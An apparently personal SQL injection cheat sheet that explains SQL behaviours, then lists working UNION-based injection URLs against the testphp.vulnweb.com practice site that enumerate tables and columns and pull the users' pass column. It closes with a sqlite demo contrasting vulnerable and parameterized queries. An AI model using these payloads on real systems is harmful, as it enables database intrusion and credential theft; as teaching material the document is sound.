SQLi and Cheat Sheet

Baran Akın
Apr 13, 2022

These notes were compiled from many sources and are for personal reference only.

SQL injection lets attackers execute their own SQL queries through a web application. Some basic knowledge of SQL and the DBMS is useful first. The following SQL queries may return different results on different DBMSs.

▪ SQL can perform arithmetic operations, bitwise operations, and many more.

SELECT 3-2;
The output: 1
SELECT 2^1;
The output: 3

▪ Quotation marks denote a string.

SELECT '3-2';
The output: 3-2

▪ The DBMS can perform type casting. However, a character value that is cast to an integer becomes 0.

SELECT '3' - 'b';
The output: 3

▪ The DBMS does not trim() data when inserting it, but it does trim() when searching for data in the database. If an exact match is not checked, this creates a vulnerability.

The DBMS offers much more functionality besides.

The goal should be to push the limits of the program with queries until a vulnerability is discovered. In the discovery phase, choose an expected response or behavior as the baseline. If we can reach that baseline with our own queries, we can run queries in the database.

Once we move from discovery to exploitation, the aim is to write our own SELECT queries. The best way to do that is the UNION operator. Its most important limitation is that both SELECT queries must return the same number of columns.

http://testphp.vulnweb.com/listproducts.php?cat=1%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11

or

http://testphp.vulnweb.com/listproducts.php?cat=1%20UNION%20SELECT%20null,null,null,null,null,null,null,null,null,null,null

To see only the output of our own query, give the vulnerable parameter a value that makes the original query return an empty result.

http://testphp.vulnweb.com/listproducts.php?cat=-9999999%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11

You can also call SQL helper functions through the vulnerable parameter.

http://testphp.vulnweb.com/listproducts.php?cat=-9999999%20UNION%20SELECT%201,version(),3,4,5,6,database(),8,9,10,user()

We can easily view the data by using the same queries that database workbenches use to pull data from the database.

http://testphp.vulnweb.com/listproducts.php?cat=-99%20UNION%20SELECT%201,version(),3,4,5,6,table_name,8,9,10,%2011%20%20FROM%20information_schema.tables%20WHERE%20table_schema%20=%20database()

http://testphp.vulnweb.com/listproducts.php?cat=-99%20UNION%20SELECT%201,version(),3,4,5,6,column_name,8,9,10,11%20FROM%20information_schema.columns%20WHERE%20table_name%20=%20%27users%27

http://testphp.vulnweb.com/listproducts.php?cat=-99%20UNION%20SELECT%201,version(),3,4,5,6,pass,8,9,10,11%20FROM%20users
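The UNION behaviour described above next to its fix, as an added example that is not code from the original post. It uses Python's sqlite3 with an in-memory database rather than the MySQL test site, and the schema, data and function names are constructed for illustration.

```python
import sqlite3

# Constructed input, shaped like the cat= values shown above.
UNION_PAYLOAD = "-9999999 UNION SELECT uname, pass FROM users"

def make_db():
    # Constructed sample data; the schema and values are assumptions for this demo.
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE products (id INTEGER, name TEXT, cat INTEGER);
        CREATE TABLE users (uname TEXT, pass TEXT);
        INSERT INTO products VALUES (1, 'poster', 1), (2, 'print', 1), (3, 'frame', 2);
        INSERT INTO users VALUES ('test', 'constructed-secret');
    """)
    return db

def list_products_vulnerable(db, cat):
    # The parameter is pasted into the SQL text, so it can change the query's structure.
    sql = "SELECT id, name FROM products WHERE cat = " + cat
    return db.execute(sql).fetchall()

def list_products_safe(db, cat):
    # Validate the expected type, then bind the value: it reaches the DBMS as data only.
    try:
        cat_id = int(cat)
    except ValueError:
        return []
    sql = "SELECT id, name FROM products WHERE cat = ?"
    return db.execute(sql, (cat_id,)).fetchall()

if __name__ == "__main__":
    db = make_db()
    print("normal    :", list_products_vulnerable(db, "1"))
    # Empty left-hand result plus a matching column count: only the users row comes back.
    print("vulnerable:", list_products_vulnerable(db, UNION_PAYLOAD))
    # A UNION with a different column count is rejected by the DBMS.
    try:
        list_products_vulnerable(db, "-9999999 UNION SELECT pass FROM users")
    except sqlite3.OperationalError as err:
        print("mismatch  :", err)
    print("hardened  :", list_products_safe(db, UNION_PAYLOAD))
```

With the bound parameter the same input never becomes part of the SQL text, so the query keeps its original shape.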
